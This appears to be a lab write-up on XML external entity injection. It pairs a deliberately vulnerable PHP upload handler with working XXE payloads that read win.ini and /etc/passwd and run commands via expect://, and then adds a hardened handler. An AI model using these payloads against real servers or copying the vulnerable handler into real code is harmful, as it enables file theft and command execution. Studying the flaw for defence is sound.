Prepare
Lab
- Linux kali 3.14-kali1-686-pae
Requirements
Demo Code
```php
<html>
<body>
<h1>Process XML</h1>

<form action="" method="post" enctype="multipart/form-data">
<label for="file">Archive XML:</label>
<input type="file" name="file" id="file">
<input type="submit" name="submit" value="submit"><br />
</form>
<hr>
<h1>Results</h1>
<?php
# error_reporting(E_ALL);
# ini_set("display_errors",1);
if ( isset($_FILES["file"]) ) {
    $doc = new DOMDocument();
    // Deliberately vulnerable: with validateOnParse enabled, libxml processes the
    // DTD of the uploaded document and resolves the external entities it declares.
    $doc->validateOnParse = true;
    $doc->load($_FILES["file"]["tmp_name"]);
    // Only the text content of <data> elements is echoed back to the client.
    $tags = $doc->getElementsByTagName("data");
    foreach($tags as $tag) {
        echo "<pre>" . $tag->nodeValue . "</pre>\n";
    }
} else {
    echo "invalid xml format";
}
?>

</body>
</html>
```
Exploit
Windows
File Inclusion
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
<xxx>&message;</xxx>
```
Source Disclosure
Linux
File Inclusion
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
<somexml><message>&hello;</message></somexml>
```
Source Disclosure
Command Execution
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
<somexml><message>&hello;</message></somexml>
```
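A hardened counterpart to the demo handler above, added here as an example (it is not code from the original page or from any of the linked labs): it rejects uploads that declare a DTD and switches off libxml's external entity loader, so `SYSTEM` identifiers such as `file://` and `expect://` are never resolved. The function name `loadXmlSafely` is assumed, and the block assumes PHP 7.1 or later for the type declarations.

```php
<?php
// Added example, not from the original page: a hardened replacement for the demo's
// XML handler. loadXmlSafely is an assumed name, not a PHP built-in.

function loadXmlSafely(string $path): ?DOMDocument
{
    $raw = file_get_contents($path);
    if ($raw === false) {
        return null;
    }
    // Defence 1: refuse any document that declares a DTD. External entities can
    // only be declared inside a DOCTYPE, and ordinary uploads have no need for one.
    // This is a cheap early reject; the parser settings below are the real control.
    if (stripos($raw, '<!DOCTYPE') !== false || stripos($raw, '<!ENTITY') !== false) {
        return null;
    }
    // Defence 2: on PHP < 8.0 the libxml entity loader is process-wide state, so
    // switch it off around the parse. PHP 8 disables it by default.
    $previous = null;
    if (PHP_VERSION_ID < 80000) {
        $previous = libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->validateOnParse    = false; // the demo set this to true
    $doc->resolveExternals   = false;
    $doc->substituteEntities = false;
    // LIBXML_NONET blocks network access during parsing; never pass
    // LIBXML_NOENT or LIBXML_DTDLOAD here, both re-enable what was just turned off.
    $ok = $doc->loadXML($raw, LIBXML_NONET);
    if ($previous !== null) {
        libxml_disable_entity_loader($previous);
    }
    libxml_clear_errors();
    return $ok ? $doc : null;
}

if (isset($_FILES["file"])) {
    $doc = loadXmlSafely($_FILES["file"]["tmp_name"]);
    if ($doc === null) {
        echo "invalid xml format";
    } else {
        foreach ($doc->getElementsByTagName("data") as $tag) {
            // Escape on output as well: the demo echoed nodeValue unencoded.
            echo "<pre>" . htmlspecialchars($tag->nodeValue, ENT_QUOTES, 'UTF-8') . "</pre>\n";
        }
    }
}
```

Any of the three payloads shown above now yields "invalid xml format" instead of file contents, because the DOCTYPE check fires before the parser ever sees the entity declaration.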